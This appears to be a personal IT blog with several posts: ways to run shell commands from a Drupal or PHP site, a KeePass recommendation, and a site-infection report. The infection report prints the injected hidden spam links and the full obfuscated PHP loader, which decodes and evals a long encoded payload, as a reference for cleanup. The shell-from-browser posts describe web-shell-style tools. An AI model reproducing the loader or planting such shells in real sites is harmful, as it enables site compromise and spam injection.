Frederic VUONG – IT BlogMy IT & Internet blog

1. Shell in a Drupal website

A very useful Drupal module that will give you a command line directly in your site:
1. Install Shell module (can be download here)
2. Activate the module
3. Logged as an administrator, go to your site.com/shell
4. Run your commands just like in a shell.

Important security note: Set permissions to Administrators only, and I would recommend to disable the module when you don’t use it.

2. On any other php sites

Here is a simple php script to upload to your website (with FTP). Once uploaded, launch the page www.mysite.com/run.php and run some commands.

To download the file: http://php-html.net/tutorials/wp-content/uploads/2009/07/simple-run.zip

More information on http://php-html.net/tutorials/how-to-write-a-php-script-to-run-shell-commands-from-browser/

Important security note: Delete or change the extension of the run.php file when not using it!

Updating my password database, I have realized that, even though it is mentioned in my software list, I had never blogged about KeePass, a tool that I have been using for many years in order to store all my passwords.

According to their website:

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

There is a lot of nice features in KeePass but one of them that I find pretty useful is the file attachment feature. I personally use it to attach config files  for the website I am managing.

When closing a project, I generally create a new database with all the system passwords (master password, database credentials…) and store it along with the projects documents. By experience, it’s quite useful, especially for knowledge transfer to the product manager.

For security reasons, I would recommend as an authentication mechanism to use both a strong password and a key file that you will store on another medium (USB key for instance). Renaming the key file and changing its extension can add as well some extra security layers. Modify the key file on a regular basis and don’t forget to back it up!

More information on http://keepass.info/

I recently noticed that the following hidden links were added to the bottom of some web pages of one of my website:

<br /> <style>#asmg {position:absolute;overflow:auto;height:0;width:0;}</style> <p><font id="asmg"><a href="http://buycipro24.com/">buy cipro</a><br /> <a href="http://glaucomaclinical.com/">glaucoma</a><br /> <a href="http://newyork-travel-guide.com/">newyork travel</a><br /> <a href="http://sciaticnervedamage.net/">sciatic nerve damage</a><br /> <a href="http://narrowangleglaucoma.info/">narrow angle glaucoma</a><br /> <a href="http://clusterheadache.info/">cluster headache</a><br /> <a href="http://www.buyziagenonline.com/">buy ziagen</a><br /> <a href="http://buyezetimibe.com/">ezetimibe</a><br /> <a href="http://rankexplorer.com">Poker Software</a><br /> <a href="http://fibromyalgia-pain-symptoms.com/">fibromyalgia</a><br /> <a href="http://fibromyalgiasyndrome.org/">fibromyalgia syndrome</a><br /> <a href="http://www.paydayloans250.com/">payday loans</a><br /> <a href="http://www.fastpaydayloan24.com/">payday loan</a><br /> <a href="http://relieve-headache-treatment.com/">headache</a><br /> <a href="http://relieve-sciatic-pain.com/">sciatica</a></font><br />

Searching from where this code was generated, I noticed that the following piece of code was included at the top of almost every php files of my website:

$md5 = “1491ea89ea9b3a86e045bb532f560c2c”;<br /> $wp_salt = array(“4″,”_”,’g',’(‘,”b”,’z',’l',’i',”d”,’6′,’s',’f',’;',’c',”)”,”t”,”v”,’r',”$”,”a”,’n',’e',”o”);<br /> $wp_add_filter = create_function(‘$’.'v’,$wp_salt[21].$wp_salt[16].$wp_salt[19].$wp_salt[6].$wp_salt[3].$wp_salt[2].$wp_salt[5].$wp_salt[7].$wp_salt[20].$wp_salt[11].$wp_salt[6].$wp_salt[19].$wp_salt[15].$wp_salt[21].$wp_salt[3].$wp_salt[4].$wp_salt[19].$wp_salt[10].$wp_salt[21].$wp_salt[9].$wp_salt[0].$wp_salt[1].$wp_salt[8].$wp_salt[21].$wp_salt[13].$wp_salt[22].$wp_salt[8].$wp_salt[21].$wp_salt[3].$wp_salt[18].$wp_salt[16].$wp_salt[14].$wp_salt[14].$wp_salt[14].$wp_salt[12]);<br /> $wp_add_filter(‘FZfFDqxaAkU/590XBril0wPcCgq3SQd3d76+684hgXO2rF2cSf+nepux7JO9+JMmW0Fg/8uLbMqLP/+IcSm+W0AMnVXiONHyutb5Fci96q1q10W++ujSKCjnjUWu57z4od9fL2jAEAp3LOqb6ID4l4uUiO+/Ugi/KNjtaorDHimEF3PcnAcRVYHrxLHEqDguJTcnaOjbPK0SHQsYPL73ycSYds0hvKE/XP4d8f3ZISL5gLykCx3rF4LZm3Fw3LQvOkb1neKbXUkyYtssv1aINj6oSZUE37B1ousYUwaB4syIWpINyHcjb9fYJft7XZpL8GWdIOTZk5/DI4l8p8WjFSOIILpgJt1Cm9S3uBUbchdHk+9BSw9JKJYtMa+WUIfXikXB6zESqa1v/Pm2YkC0shomnxtSN3P0PDLaI0glSspS8w2tc/rb61zMNEdYpyGTn62Lt6buQykSVxhQt4indQSPrddr16TISKl+B3ngQfDkSgKKiBxlAlQWo/MVYTOvAXEQjwdXq9WkN++5fqxIJyKnC0/YUF5Hi6BN30DFhm0NEtkiUT5OQHr6MQ73Nezj659i49WGupwgVlCNIsnxlfbnTxvWzJ3dB09+x6Irhl6kB6UlNYcSVULFJfqJ6l1XhzX6cKaZNSahR9R8K4sR4LdPFQ5WLxUJgUeo9S3lAbcN4vy4dftDbtCSxd24IRB402vDq3L4muc1WZwybfui1s1bsbnL5jbciY2pKVIKNrB5ykkbvhPjSxaV1jGsMlW24aTiFynSpkbdQUzxRhmd7OiR02MHCGBcMc1Ltigjn3E7M71NfTVX6JQ9myx8+90gAJJ5+Z0FF7OWcKLwEjSE3VOyGtbjWqH3aM6igRt84YMOBTS+CFuqugjrK1Wv9D64GihVakhzUQvhCnqUX4qsfaffW8/+ajhr0xD21oNhTRQZMI/Z07B1YCVT9oevpp38U96kHD0zBIifOcr9pKxDukpxx7v7HoM2xVlJUSRItX2qSD5Q8GXyMAAyF8MlYE/PhTvieUzBNtaJae69IjYnWgqEOhk3jfK54K6DIpVod2GbfSoPsFJK1JcEE745nu+eTzqH1dtQCwp95+3V7+BGv86Q3bxWC26YHpGpOpm9qqSCsqL1yWF3xJD1Y+laDS5A+VvaYUk7A7/YxNVjn0s/S4hR7SDQpSTwkE3FOIM6patKGTPo65jSM5gyimnGGZ01YIMiAcTbukOiDRDaME8pS6YtwLye9is+H2qSgNIlr/qwpTvLYWTi4AmDjUhKCi6UtAaQHO/98LAJspIx01NEHix0XwSOJy4/0zW1gcgEmcsvkEh9yh3a4RnP0jbuY/rutz765JDmlAPdBj5VAedqfEJi25NHlsPjnXGDuMQXg/8wOOoxye7wCFKt9W2bBllGKcAPv3t61gdtd4lk1RNdNdWdOWtmlQLGvvKReGlVi77rhCkVUOkmjKpMxxHwYAV/gSeCiy2Fg80y8lUQBBd/ZxcEJWQBa2K6YKguh/0OB4aDmMRXy51Ojb4BfaFtV8gZGqXLZ/hd+FQ/yVBQU8jnxUeH+Z44yIhs3dQSAUs2GvshqEZkFcEt8pK9pXl5K7mAPTjK1rh4ygIv8XL5fOLnNFImQlkUOdSYfeJw1Q6SipO5npZUHPVDmJp5DhmjSbPHd66kaWR/4HoYKX0a0+yS19veOsPX/sTbbtr90EWVVBQAn/sOC7lZSG/N1Y7MNLhH6AynQRSTnvXx07rsdG1XmsS1jt3CRNN+zcNDXci2J0Juep8pFjpA2zwHrSuzZq71vHUTO/1N/X0ap1bYzg9AYa22Wnuafqmqa0A6DgmIxZ50oOZGXmHL87OYs7rN1jxsBy7qsZ1CYOUOIH3MhUWR0BZC95tLJe5DITmmDK8RlVU1F0P/LmWli3Gb0bSbIAzpjTZs0QPI0dS6q2/pVZufaSR4DZLdAnmrX3jj7IGziPUbT+8LNxDjsyWFgoy+rjtYVlR46dTNJ1I1XwWotcd1Mf22pKm6Z/vBXpPchWy1uDfEAt0ke+Rd3+D9NU0rKHXlzqMC2GaxCkKBNQpWFOLIl/4tNjTEpv6D5AC9a0abf4DNN4r9OGrus7JANiLpOElKngGkgu+OSjyHwVJzcr7GXQCpKqzdd0bfO/dm/le+d3HMXKCQwZ5urJA5eSAI+1Z+M/9KNQwlS5eCd8dhBKjKYn+I52Z84/5rffj4BkgSuj+pnBUf9+e1G60tPw4L234i6OvIxDVyjNhm3HE6IQKJCq75jhC1Eo+rkAWYA4VlKs2fgIJ68E65ql7oPQlGtRtgGnvnM7bWrQV/zZKFd+XR7TUssHeW28cQJngHTMcTgqQV2A819nqjfD414/b6+IFKvZ7JnaPoGjsnKx7I19N9Jrmajz0q73A0BGJ/buCMvfj9LmapnWBWP1kgd78MJI5SK58QkrBC8lZt7Vb20yJhHoHH5351jdg/KASf+p6Q1ne+rYJZSDt1Xzsy5ePK4S9im42nozuKxVH1eFMzQAjJehFuyF1kTyqSqa1OYPUN3vbh6EnO+s6WyeUwO5DO5fx0CYd89pdGGoGJrZ+I2Y99ND2YpqXWGQGXEHZED4lhvduJAYOkCRh6vorh7o5Ec8nqWrYQIKlJzcfYMgZi/NFdSk2Hs7qLJq6lu28aJdLaJG1hCzq89TXJ4zO1kCo4o2voDgsskYm3l3dR05CRjV1CSE946sHWcZuZ+2GUV1G5YGRQRTa3z6kaeKXOHqNypjQD2z7SG42ICWDKfi7lTWTwjhS6yHKmktBs9SIFFD5HIRAUiakD94DgsBWotHYEutMQNJvL8bMes4C+xmKbMEPLacbGP0Poc5/gsP7eqhQDzi9x3IrYGAkIHae2GH+Ydjosegeaa/SXk/gj81d5DplSzV1bRzDD+EUzvJutlupz9YryTAtQT6ytBERHsWSt+nOvw+ysfjqjQWWo42RoRyqUL78yYwfCeJvLHR8ErBqxEf86gnY4TsiC7kzv6UwCZ+4r+TB16lccR5mnqSXB/efmXlgYrXXdLiulGfAoy0r8aBALS9cT+8coT3bt5bfAejr4Rob2YMCaLOKg18xy/xzra3Q2yDRH3mRquJEpPA3oE7TSTVJ7u4CAgZ1JLV2eb9mSlQsxqfBJGTIltP0cy1MaGsTeKnOohLn8nTpv3faU+TbfkeZop2fBpnCPttupYpkhg63Ure2FqSjlp/iWt44JrxAlxii+Haol9LqpVIm/xRD1Fi05tGerO5qDlUBX6FMbXFNBO3/GkA8dyHf9gdTbFA+IqzfBX8svWgMl6ukaX858ij1e8nxcoB2EurBiIAELvLZzQfggz7GENRv6BPuKnMkj47pLZqgd3oZMq5kkyFyDBxrQHQZV58Jk+FnD9Jr4KPLqQ1csgJTSKWI8vjBbTYkCDQRblFYwp3xT8NsoyFtANeraZGzWpN+/sobTA/umQelYPCr3vRz3I3+RmQJeJU5EGhLxP2ySVQ8oKNZ56wD58O+EL50LWHQn1JB9PyyrIjbFA56NwqGZcwKQmR/CLLqmT9PiWZdL46p6bD6WnnnmnU+yfXKVPBzzEz7DEyHGtdxTBFINAd80/czp85wU5T0y12WoYCxd2RTRTPs3YER1GYcPJqXIURJtgyfoMidWqXwV6e6A6lrbeEV0NmGPmNLATTQemhuP79KAwZ1Mgvl9fOQNsqLOpQo6+rc2RwVrZFRsm9x5ZPNWTQgLNjJkru+++4yFqt6bMg4WSoJw2a+Nt/HrymDSVQdDJUun+hzaGbs0fMfZjwx058qx4Jb5hQz5PHeyWzzDtnnu10r5pZN+8tPvd19XQUoIA9SWGFD2sKuSuuNLlVJ+QhXulZpebexIiaTNHviSTSXuSA1ljkQlanUsbdA9gLWfgVCCT3px7hmLCIZ758I3dQPYsg4NQBet2nwIjk+vmFaCIpkO+9JId5XvneuXeMpmQnzX/V+xvR0IsfEPGOL0/IFsaG5YEogT/qlWLzz8lgpAcfvp5lubUml3J6338FDKmICJG3ho5uO/NQAevEpn4bn8Rmwcyq7Ly0gAiQyhBSjEY+79JO7+1ELS4hIxLKMiD7n4IArpIvgagkBlpDcBICTykYzzceCnwDnoGxEduIGcgeiQsTNnBL3h+/z21Cex78tOjODXsGKTfCxvCdiqdjdiqT22qjommo7Kzekgnatm8PYXJM7q5xYjnQCj/HwLCK6zyEY3coQu+Ni6bruVq1Bdr9eK7e2RXn68HHw+djRAZJxMCLBqEawv480ZJw0L5x5EEqFPFHK+S10WN3xbh8Y6juDKUSt/SEd1eVcW+2J2VPMZNZYdLQMiGCR+ZvY3yXu5fEyCkWX+11rzzmu4wnLAddDpIPCKMZmo7OIOASg9rCkssngHhqNy94MjcJvPnaYNxJdQA4PxUldK9DoyU6rB0sH7UpZV5q4ywKnaM1pDF/ttJzQRiy4pe06R6ZxHjXLDnXfkfwYiamtsaO6Q9IzuDN0s7hv8ujm7IaZuclwZ324jh4ykL3uIM1RfvTSTDYH2JoqiQm3qNVv/WUJjqrPu1NnHalWUz7N1sSihRspvgWPJbdhXCONTjKP5HChf0jRLjCFUhP36QLm175MoVPD4pcDaT4vGuoZ4vaJ9+lBElW9F3ca0tpDC4Zwvx1AkNi1HP17pVEsYGDHsGszxzrQKj/A0JJUEHtGIxNRF8nkzDWQ7LL8DbjfBGAPOkkV3k5tcnrVdzLdbn+dts4dbbi2wHhmzASgappaqVFFMfe7P9VsHPlf44fBsn/XQWyQzgCkztQv41evE4uRklCDgpcq9p6KvXKYYKfZz8kFWlrl3LXscSwyuw5Q9NhOovfvg5ysk2kNBkgdF20qZ58R6KQkce0RjaDu0/SyguaZTRstZACdO37kZB3xoatQtqW5exbiFuyzU33a1IvyRBxNwCbcp2r8BdRqz6nUdgbxn5iwArNogoiY2XsiYy9Bn77xXBeTdnYvz5wio+kuw8chHAN7Zz2+YlnPOHByhLj+BRtbKzdq4fnv2lQJS7MqWXY67uk1+B388q4kyRLNm99tZegVSiTzxThV62PqLdvIAxDeTTKbVeHjN4qUYvsMrar1UxpVbuTGYB+opDtJnWU9Pcke5v1v8ZDTkK5K6n0xy6gcjLOMX+dQlAXGpN5/5eUwA3R2M3uF6fAU27tlflxikHqN80An5TcQ2ZN/QiD6VzgAu/AuYVMDTZU+qKhoIqscyIkg7QI9f9cf8HoSW9Nm5pMVtczPlJNTCf1vc56bPk7dRRCbS3caNDg788s0SsXrGPWrMg/tU1HqiflekfWoF+9vXE0dPMc0VGKELjvGx4vTQf58q1AYFNrqxMnxkUm/55aAhyWSRjR7HCKS1Cd/DjQaMZkpgpe2xMstTPoE5nvuwrFzagDYD8/m0647iG+5k/BWEd5VnsA4ZiKi4vsvAwIWXq4N2MNlpYd3TqidHW3nPFeq8ao+EYvH8AeMISspYn4oz7PRFkL8NN9OAe8r8QO3T+LgTFzQyvrQKQ2+smUCtt/mewEYkfEdo9moYBKSaLvGbRAUFot0dNs9c27mYgl2Orf0gwu+vYUO9REn3o7NZwy4c60vQmimekTwszDFARC2UNflThuZ4AET2sCaiMIBrK7cvJWAJgPGsy8Fvd3LDhbfHu1dUE3m8uFhTgnfDZbSyFzHebK1CIQMo02Y4iwKf517MgNStoIY+Mh8UCwfYZL1JP2oxF0v7QvEm8AxQrN6ld09XYshU3SXdQqm3rUDivxUHE1GfZ7OfllQqMDzGYbHbLtr3QlU9KlOIKerlw65uWEoFH4FfqKjj3qqh+yGLrXTEYvCFjQsiXHbIMuFstHRbDkZgKK6Ljhl/a3HRhPmUSVnylNX0PsuGRUb2ewgCrBB/42UwfVAuHZjs0QIBvOU32XvU1qY+CTl0OI8VsXasWyQgDS5091krzhRWSz423NCDNyzD/Au0k4zo5gu0hD7XpRTmqxtjECzK/mZe9scEw4G5pAKi1jXaY0ac1M17v5QFWypglj0eeEjNut9dPXDaEaRjjIkiT/3SgXhq2Muuvgn5Weoq15kH5xkLalqrEIHfdAOr0oZ5wRQM8KaxaZj0ovy9H96MhqrB+9YUsyVd2yJnvNKy/3dcWB2o6BBuW9AXYA6Wc+YquYB+ztG8tz1TNh7YXvnNkfT0K2O3c/xM/WCMw/UD81YfWDo/FEeVslvACorPONtiShjQcRamYTPiF3FaL2wgQWEbUwFqP0A8r29CfEVFWjih2hGj5lyivDhY6JExKp1yF3nHbBwunPxi85B4SImT5+MwU5ilfntm5oI4RO6aUEUtvsDCCz8RJoKfSbSA4YeKpuQgmuv4NWArm+8asmEJTTTgCQg8kcvGIW08wk4F4dHSBI2STOi8wBufl2aUEXf7Gjl3cL2TMqgjcLh56cZFn+LkIMPQp9D2TeqpLrdmUylrx3XL4JslE9Zx3YE8vQz7JgDtnsvaE1sx7xZ79Ec5FftWP3RU6GObgnGtRCHY/ArX9i9nLU2zbQlLcIuFrkHN7VhYZt/Ga2Ea8laW5tUvWO0SUPjAy9KhdxEwSHpW3rGaVQhcbDJTQRtEan7kyBOcYcUid9ewmbifAuXSoGj67oSv7NQ5sNxiO7K987rVA8keErMysnrTM2yOA3VgJwHs5RAT2ecLBWKb7kruCYW6Nee8hsI0nNDJnDQIeegRw47y9gH9LtzFXf/R6YGL38r2PjyJ3C37XTTGHd0vbQE6T/UC8WsbVAab40NLFoihhkmvQq2cOnlG1cbsGCEHfp4q7NCcbr2M9c/6aPuBmCFVxTT7ohJDBI1cIQifDj8fv+XKH/hYm4KT453Lj3D+KVrOfcwjYgOE9flXM/YfVILytQk4+QX6DWp0ktdYGK8o/KxSjyzg/AZyWyQPKKaPGtHUl7YFI+hEEL9+A4tD7aSDO157IYyY0tvb2u5rjNmLgza4D/xp1PQPeB1QNNDw92fnWn0ZDI/3I4W7Bv3CxnnDEA9EC4klXb6sOX2XiWiJq02kRdC0W32r2KeBdUB5RfbTxBFY0LKBX1/e0VN7+tyw/5FCH6rfrpYjEkFzSs+rp5ShX+GGeptad/WrVjj6PouhVlF5L/xSBdKB7wW51yidL4FtUhmNza3rkSf+tW7u5HCbffQHMC8f2aMwA3lqmXhgIydJ6/7SHVZOIyPdUS5k3xX5xPiKpm43q443nUO+RqI1ZzIFN5JhlZG15UrgzwMVlXvkyCS/8akOlRWrsOBjaMlUAXYJa5+vNoBL+osdSAUP00M3KugiMSuKUCX1GYLklWOHX7hhaMvWBkhYm6Jki1SEov2V1LgjoXCHIlfXQCZHDhIOfa3q3OzR4oJKqVPjJ2JZoXm8mrfA58hflKrwDMJmv6Z/bBJRRT+72lUVO9YPEns61WAWNpwQsWlV2xSI8Sm8aPKgv/rQV47aGEoI//EEVLYXXGuYdgJi21Gs5Lxo8PGkDjM3L6LrRglqSaLX1ByIFC8wPyTRfbRL+dCZXHnMfKHyQMzQdWMY/HhurhercKAaHf62Y3uQRXXrAuQAnHmzOT0y4fXhNbs3MKBDEA2ZfmWteYuEJFz6DOHwuULxh991sDuSEd/euHJgLja0KDEI4FCTppgJllSkEKVcctCk0EF4NIojmCLzLyArVOlnw4EVpaD4KjKB3GKwxZYb6SjcuQcqXrFLsL2nEa6dCv4p0Vx/M9bcuboplORZmsby387OheEDb6o/ERhg8tQuazwmSwIjDNSmvKTE5J+vW83THATVasLSsAS0WtJEyX5t0hiCSu9AVbohqMIEqIjWmyRgdxW57qU9nQyq9uUzWhhhuDk9tB6f26mm0iTYu12/upT4fSKxEe6oVx0e45GWjeMeMMEXNnJhKx5IPJdMJqufT2L4omiMfRmGndioZEa9U5xemoD51x3G4r4AHUSAZelJDNN80uQRifyL5LBe5Rq+WdqDNgwtJRxU999+E52T09SGy0aQH2iR70K3lI18CmvI6+gIJJNg/p27wuz6aZYH+TlxJ565ubwm42FWMGpRy+M/NqZ/SA2v2lLgeLIrCflaMQUy9xsS6p5zNLTFtYqSi3PcpZMcA2uAaIWZwyw2cLfJ3J1vhiFlpvGK1akhW8+xTDZt4A9+c3M1TEChB8YTv7+pWuQki9THNzQaAdx9TwqH5QeK7Xvw7zmADytTHYnEoZx3lkN3XkAQmPwKFujs2DAeTuPtdieGLHLFcA8Z4sv6RUQCVlvFwbXyXZMG6Lpeg4xjO6nLpa+ts6jOyjtO13swBgglftlsUPcRgk4iR76MJQDsr6uaF3T/bLRtJbP63Yq7FOQAb9d4oT88C5jSQ4NLHkQu1+OkW/Krev2mwdXkAnP03KSUrcX0Dftrf5AcURAEyxwEa+q///z777//+T8=’);<br />

Browsing some websites, I have found that some other webmasters had the same problem on their sites. Here is the best description of the symptoms related to this malware:

http://www.marinbezhanov.com/web-development/6/malware-alert-september-2011-sshell-v.1.0/

and here is a php script that was developed by PHP Beginners to clean up all the infected pages (http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html).

If you found the malware in your sites, copy the cleaner.php to the root of each of your websites and run it with (http://mysite.com/myinfectedsite/cleaner.php).

You should as well find and delete the following files if they exist on your server:

wp-thumb-creator.php
b7a.php
a95b.php

Hoping that this will make the full cleanup, last but not least it is strongly advised to change all your passwords (sites, database and FTP).

I suspect that this malware is coming from on of the wordpress plugin but cannot confirm it for the moment. I will keep you posted when I find the patient zero.

Good luck!